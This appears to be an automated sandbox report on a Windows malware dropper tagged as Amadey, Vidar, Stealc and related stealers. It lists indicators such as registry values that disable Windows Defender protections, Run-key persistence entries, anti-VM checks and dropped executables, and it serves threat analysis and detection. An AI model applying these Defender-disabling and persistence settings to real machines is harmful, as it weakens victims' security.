Malware Analysis Report

2025-04-03 09:25

Sample ID 250306-bmzldatyft
Target 8d69e64b83a54089dcbf55a2aa726a905040428c9b5ad0ffc53876256640e18c
SHA256 8d69e64b83a54089dcbf55a2aa726a905040428c9b5ad0ffc53876256640e18c
Tags
amadey gcleaner healer litehttp stealc stormkitty systembc vidar 092155 ir7am trump bot defense_evasion discovery dropper evasion execution loader persistence spyware stealer trojan collection privilege_escalation
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

8d69e64b83a54089dcbf55a2aa726a905040428c9b5ad0ffc53876256640e18c

Threat Level: Known bad

The file 8d69e64b83a54089dcbf55a2aa726a905040428c9b5ad0ffc53876256640e18c was found to be: Known bad.

Malicious Activity Summary

amadey gcleaner healer litehttp stealc stormkitty systembc vidar 092155 ir7am trump bot defense_evasion discovery dropper evasion execution loader persistence spyware stealer trojan collection privilege_escalation

Modifies Windows Defender Real-time Protection settings

Detects Healer an antivirus disabler dropper

Healer family

Modifies Windows Defender TamperProtection settings

Amadey family

LiteHTTP

Gcleaner family

Amadey

SystemBC

StormKitty

Detect Vidar Stealer

Vidar

Stormkitty family

Systembc family

Healer

Vidar family

Stealc family

Modifies Windows Defender notification settings

Stealc

GCleaner

Modifies Windows Defender DisableAntiSpyware settings

Litehttp family

StormKitty payload

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Command and Scripting Interpreter: PowerShell

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

Downloads MZ/PE file

Windows security modification

Reads user/profile data of local email clients

.NET Reactor proctector

Loads dropped DLL

Executes dropped EXE

Identifies Wine through registry keys

Checks computer location settings

Checks BIOS information in registry

Reads user/profile data of web browsers

Looks up external IP address via web service

Accesses cryptocurrency files/wallets, possible credential harvesting

Checks installed software on the system

Adds Run key to start application

Accesses Microsoft Outlook profiles

Suspicious use of NtSetInformationThreadHideFromDebugger

AutoIT Executable

Suspicious use of SetThreadContext

Drops file in Windows directory

System Network Configuration Discovery: Wi-Fi Discovery

Browser Information Discovery

System Location Discovery: System Language Discovery

Unsigned PE

Event Triggered Execution: Netsh Helper DLL

Program crash

Enumerates physical storage devices

outlook_office_path

Suspicious use of FindShellTrayWindow

Suspicious use of SetWindowsHookEx

Kills process with taskkill

Suspicious use of WriteProcessMemory

Suspicious use of SendNotifyMessage

Suspicious use of AdjustPrivilegeToken

Modifies system certificate store

Suspicious behavior: EnumeratesProcesses

Modifies registry class

Modifies Internet Explorer settings

Checks processor information in registry

Scheduled Task/Job: Scheduled Task

outlook_win_path

Delays execution with timeout.exe

Uses Task Scheduler COM API

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Reported

2025-03-06 01:16

Signatures

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2025-03-06 01:16

Reported

2025-03-06 01:18

Platform

win7-20241010-en

Max time kernel

150s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\8d69e64b83a54089dcbf55a2aa726a905040428c9b5ad0ffc53876256640e18c.exe"

Signatures

Amadey

trojan amadey

Amadey family

amadey

Detect Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A

Detects Healer an antivirus disabler dropper

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

GCleaner

loader gcleaner

Gcleaner family

gcleaner

Healer

dropper healer

Healer family

healer

LiteHTTP

stealer bot litehttp

Litehttp family

litehttp

Modifies Windows Defender DisableAntiSpyware settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" C:\Users\Admin\AppData\Local\Temp\10108780101\b3530bb0e7.exe N/A

Modifies Windows Defender Real-time Protection settings

defense_evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\10108780101\b3530bb0e7.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\10108780101\b3530bb0e7.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\10108780101\b3530bb0e7.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\10108780101\b3530bb0e7.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\10108780101\b3530bb0e7.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\10108780101\b3530bb0e7.exe N/A

Modifies Windows Defender TamperProtection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\10108780101\b3530bb0e7.exe N/A

Modifies Windows Defender notification settings

defense_evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications C:\Users\Admin\AppData\Local\Temp\10108780101\b3530bb0e7.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" C:\Users\Admin\AppData\Local\Temp\10108780101\b3530bb0e7.exe N/A

Stealc

stealer stealc

Stealc family

stealc

StormKitty

stealer stormkitty

StormKitty payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Stormkitty family

stormkitty

SystemBC

trojan systembc

Systembc family

systembc

Vidar

stealer vidar

Vidar family

vidar

Identifies VirtualBox via ACPI registry values (likely anti-VM)

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\TempKKPQ9REKQ59CO3PKOOAPGR8TAPBIRKGZ.EXE N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\ProgramData\xishrtx\ukdupn.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10108710101\17f337a055.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10108730101\001fe21595.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10108740101\cafe79aeae.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10108750101\0d8c3b8c27.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10108780101\b3530bb0e7.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\TempEZ54RVN0BRBSYKQEUJMKPJ7U62CGNUVD.EXE N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10108760101\d489e96a96.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10108820101\FvbuInU.exe N/A

.NET Reactor proctector

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\TempEZ54RVN0BRBSYKQEUJMKPJ7U62CGNUVD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\ProgramData\xishrtx\ukdupn.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\ProgramData\xishrtx\ukdupn.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10108750101\0d8c3b8c27.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10108820101\FvbuInU.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10108780101\b3530bb0e7.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10108820101\FvbuInU.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\TempKKPQ9REKQ59CO3PKOOAPGR8TAPBIRKGZ.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\TempKKPQ9REKQ59CO3PKOOAPGR8TAPBIRKGZ.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10108730101\001fe21595.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10108730101\001fe21595.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10108760101\d489e96a96.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\TempEZ54RVN0BRBSYKQEUJMKPJ7U62CGNUVD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10108710101\17f337a055.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10108740101\cafe79aeae.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10108740101\cafe79aeae.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10108750101\0d8c3b8c27.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10108760101\d489e96a96.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10108780101\b3530bb0e7.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10108710101\17f337a055.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\TempKKPQ9REKQ59CO3PKOOAPGR8TAPBIRKGZ.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108450101\BUZd3Mq.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Build.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108470101\5f791593f2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TempEZ54RVN0BRBSYKQEUJMKPJ7U62CGNUVD.EXE N/A
N/A N/A C:\ProgramData\xishrtx\ukdupn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108680101\2asf3YX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108710101\17f337a055.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108720101\c9a9737454.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108720101\c9a9737454.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108730101\001fe21595.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108740101\cafe79aeae.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108750101\0d8c3b8c27.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108760101\d489e96a96.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108770101\16cfb950e7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108780101\b3530bb0e7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108790101\2asf3YX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108800101\nhDLtPT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108810101\Ps7WqSx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108820101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108830101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108830101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108840101\ce4pMzk.exe N/A

Identifies Wine through registry keys

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10108780101\b3530bb0e7.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10108820101\FvbuInU.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Wine C:\Users\Admin\AppData\Local\TempKKPQ9REKQ59CO3PKOOAPGR8TAPBIRKGZ.EXE N/A
Key opened \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Wine C:\Users\Admin\AppData\Local\TempEZ54RVN0BRBSYKQEUJMKPJ7U62CGNUVD.EXE N/A
Key opened \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10108730101\001fe21595.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10108740101\cafe79aeae.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10108750101\0d8c3b8c27.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Wine C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Wine C:\ProgramData\xishrtx\ukdupn.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10108710101\17f337a055.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10108760101\d489e96a96.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TempKKPQ9REKQ59CO3PKOOAPGR8TAPBIRKGZ.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\TempKKPQ9REKQ59CO3PKOOAPGR8TAPBIRKGZ.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108450101\BUZd3Mq.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108720101\c9a9737454.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108830101\mAtJWNv.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Windows security modification

defense_evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\10108780101\b3530bb0e7.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\10108780101\b3530bb0e7.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Windows\CurrentVersion\Run\5f791593f2.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10108470101\\5f791593f2.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10108480121\\am_no.cmd" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Windows\CurrentVersion\Run\0d8c3b8c27.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10108750101\\0d8c3b8c27.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Windows\CurrentVersion\Run\d489e96a96.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10108760101\\d489e96a96.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Windows\CurrentVersion\Run\16cfb950e7.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10108770101\\16cfb950e7.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Windows\CurrentVersion\Run\b3530bb0e7.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10108780101\\b3530bb0e7.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A

Checks installed software on the system

discovery

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ip-api.com N/A N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\rapes.job C:\Users\Admin\AppData\Local\TempKKPQ9REKQ59CO3PKOOAPGR8TAPBIRKGZ.EXE N/A
File created C:\Windows\Tasks\Gxtuum.job C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe N/A
File created C:\Windows\Tasks\Test Task17.job C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WScript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\xishrtx\ukdupn.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10108770101\16cfb950e7.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10108780101\b3530bb0e7.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\TempKKPQ9REKQ59CO3PKOOAPGR8TAPBIRKGZ.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10108720101\c9a9737454.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10108730101\001fe21595.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10108710101\17f337a055.exe N/A
